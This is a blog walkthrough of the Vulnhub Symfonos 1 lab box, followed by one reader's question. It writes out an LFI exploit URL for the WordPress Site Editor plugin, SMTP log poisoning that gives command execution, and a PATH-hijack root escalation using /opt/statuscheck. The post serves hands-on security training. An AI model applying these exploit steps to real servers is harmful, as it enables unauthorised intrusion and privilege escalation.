Vulnhub – Symfonos 1 Walkthrough

Scanning the box with nmap -A -T4 -p- 192.168.1.11 –vv

The host is running smb service that we can scan and list the shares:

So we got a file named attention.txt:

We can now login using helios username and one of these passwords which will be qwerty (after testing each one):

Let’s download these two files research.txt and todo.txt:

The new path /h3l105 is a WordPress site and also change the hosts file to symfonos.local

wpscan –url http://192.168.1.11/h3l105/ -e p:


It says that the upload directory is listing enabled so we check it out and found 3 sub directories:

So i googled it and i found an exploit for it:

And the exploit is LFI command that we use to display the /etc/passwd file:

http://192.168.1.11/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Ok at this point , back when i was doing enumeration the port 25 is poen and had now use till now, we can use SMTP log poison method:

Then we put this line in the address:

view-source:http://192.168.1.11/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&c=id

And we get something like this:

Now to get a shell we put this command:

Let’s use “find” to find SUID files: find / -perm -u=s -type f 2>/dev/null

There is a file /opt/statuscheck where we can abuse using path abuse:

cd /tmp

echo “/bin/sh” > curl

chmod 777 curl

echo path

export PATH=/tmp:/$PATH

/opt/statuscheck

2 thoughts on “Vulnhub – Symfonos 1 Walkthrough”

  1. Hi M.Khfaga, thanks for the amazing guide. I’m trying to complete this box to increase my hacking skillsets (hopefully). Could you just help me understand the purpose of adding the symfonos.local host inside /etc/hosts file? Is this a compulsory step? and does it have to be precisely ‘symfonos.local’ or can it just be added in as ‘symfonos’?

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s